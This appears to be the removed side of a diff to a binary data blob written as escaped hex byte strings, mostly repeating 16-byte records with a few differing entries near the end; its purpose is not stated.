-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\xc2\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" 
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" 
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00" -"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x9c\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" 
-"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x98\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x9c\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x9c\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" 
-"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00" -"\xb2\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00" 
-"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x98\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00" -"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x01" -"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x9c\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" 
-"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x01" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x98\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00" -"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x9c\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" 
-"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01" -"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x01\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" 
-"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00" -"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x01" -"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00" -"\x00\x98\x00\x00\x00\x00\x20\x01\x99\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x9c\x00\x00" -"\x00\x00\x20\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x18\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x20\x00\x00" -"\x00\x00\x80\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x20\x00\x00\x00\x00\x80\x01\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" 
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x40\x00\x00\x16\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\xf8\x00\x00\x00\x00\x80\x07" -"\x98\x40\x00\x00\x16\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x98\x40\x00\x00" -"\x16\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x70\x00\x00\x00\x00\x00\x00\x98\x40\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x07\x08\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf4\x00\x00\x7b\xc0\x02\x02\x00\x00\x07" -"\x00\x00\x00\x00\xe5\x6b\x00\x00\xe6\x6b\x00\x00\x15\x6c\x00\x00" -"\x16\x6c\x00\x00\xbf\x6d\x00\x00\xc0\x6d\x00\x00\xfe\x6d\x00\x00" -"\xff\x6d\x00\x00\x36\x6e\x00\x00\x37\x6e\x00\x00\x1b\x74\x00\x00" -"\x4f\x39\x01\x30\x00\x30\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" -"\x01\x00\x00\x00\x8c\x0f\xae\x00\x20\x2c\x61\x07\x39\x00\x00\x00" -"\x02\x30\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x64\x00\x00\x00" -"\x02\x00\x00\x00\x23\x00\x20\x05\x4d\x39\x01\x30\x00\x30\x00\x00" -"\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x8c\x0f\xae\x00" -"\x20\x2c\x61\x07\x39\x00\x00\x00\x02\x30\x00\x00\x06\x00\x00\x00" -"\x02\x00\x00\x00\x64\x00\x00\x00\x02\x00\x00\x00\x23\x00\x20\x05" 
